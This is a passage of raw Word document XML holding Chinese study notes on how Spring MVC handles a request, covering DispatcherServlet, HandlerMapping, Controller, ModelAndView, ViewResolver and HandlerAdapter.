          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>控制器查询一个或多个</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，找到处理请求的</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3. DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将请求提交到</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4. Controller</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>调用业务逻辑处理后，返回</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r w:rsidR="003E053C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="003E053C" w:rsidRPr="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Handler</w:t>
      </w:r>
      <w:r w:rsidR="003E053C" w:rsidRPr="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>返回的</w:t>
      </w:r>
      <w:r w:rsidR="003E053C" w:rsidRPr="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ModelAndView()</w:t>
      </w:r>
      <w:r w:rsidR="003E053C" w:rsidRPr="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>只是一个逻辑视图并不是一个正式的视图，</w:t>
      </w:r>
      <w:r w:rsidR="003E053C" w:rsidRPr="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DispatcherSevlet</w:t>
      </w:r>
      <w:r w:rsidR="003E053C" w:rsidRPr="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="003E053C" w:rsidRPr="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
      <w:r w:rsidR="003E053C" w:rsidRPr="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将逻辑视图转化</w:t>
      </w:r>
      <w:r w:rsidR="003E053C" w:rsidRPr="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>为真正的视图</w:t>
      </w:r>
      <w:r w:rsidR="003E053C" w:rsidRPr="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r w:rsidR="004B58BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5. DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>查询一个或多个</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ViewResol</w:t>
      </w:r>
      <w:r w:rsidR="00E04B89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>视图解析器，找到</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指定的视图</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>视图负责将结果显示到客户端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00002CAB" w:rsidRPr="00002CAB" w:rsidRDefault="00AC23AF" w:rsidP="00494E37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerMaping</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>完成</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Url</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Handler</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的映射关系</w:t>
      </w:r>
      <w:r w:rsidR="00494E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>andleradapter</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（处理器适配器）作用</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00002CAB" w:rsidRPr="00002CAB" w:rsidRDefault="00404678" w:rsidP="00002CAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这个组件，它负责的是定位请求处理器</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Handler</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。这是</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SpringMvc</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>处理流程的第二步。那么，当定位到</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Handler</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>之后，</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会将得到的</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Handler</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>告知</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00002CAB" w:rsidRPr="00002CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandlerAdapter</w:t>
      </w:r>
